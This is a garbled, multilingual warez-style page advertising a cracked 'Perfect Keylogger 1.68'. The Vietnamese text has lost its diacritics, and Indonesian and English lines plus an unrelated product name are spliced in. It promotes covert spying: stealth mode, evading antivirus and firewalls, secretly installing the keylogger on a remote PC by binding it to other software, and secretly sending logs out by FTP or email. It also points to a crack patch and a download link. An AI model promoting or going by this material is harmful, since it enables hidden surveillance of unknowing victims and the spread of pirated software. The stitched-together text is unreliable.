perfect keylogger 1.68 full 2012

Ghi li các cú nhn nút.
Giám sát nh kì (nh chp màn hình).
Keyloggers are programs that corel painter lite mac review detect keystrokes, making it possible to save everything that is written on a keyboard in a text file, so that it won't be difficult to know what someone has been doing while using.K thut bên trong phc tp che giu di giao din b ngoài thân thin.Tính nng mi Smart Rename (i tên Thông minh) cho phép bn thay i tt c các file thc thi và entry registry ca keylogger bng 1 t khoá!Thanks to, perfect Keylogger you'll be able to know what websites your children visit when they delete the browser's history, or if someone has used the computer in your absence and what for.It's a keylogger that isn't detected as such by any antivirus.Teman-teman dapat mendownoadnya secara gratis disini.Note : Jangan gunakan program ini dengan bermaksud tidak baik, apalagi sampai merugikan orang lain.Jangan lupa menjalankan pactchnya.Log upload lén lút qua FTP.
Nó hot ng hoàn toàn lén lút (stealth mode).
Mt trong nhng tính nng mnh m nht ca Perfect Keylogger là kh nng phát hin t khoá và thông báo - cao.Bn có th gn kèm con keylogger vào bt c phn mm nào và gi chúng qua e-mail cài trên PC t xa 1 cách lén lút.Ghi log clipboard, gi log và nh chp màn hình qua e-mail trong.Perfect Keylogger là mt phn mm keylog th h mi tuyt i không th b phát hin.Xut log ra nh dng html.Rt d s dng link down :m/?gjqi3vq28yqqusa (khuyn cáo ai gà m v keylog thì ng nên sài, vì có th cha hack c ai mình ã bi hack ) thy hay bm thanks!
Bn không phi lo lng v cnh báo tng la - bây gi phn mm keylog ca chúng ti có th n i vi chng trình tng.
Theo dõi mi ngi dùng trên PC, thm chí c khi bn không bit mt khu.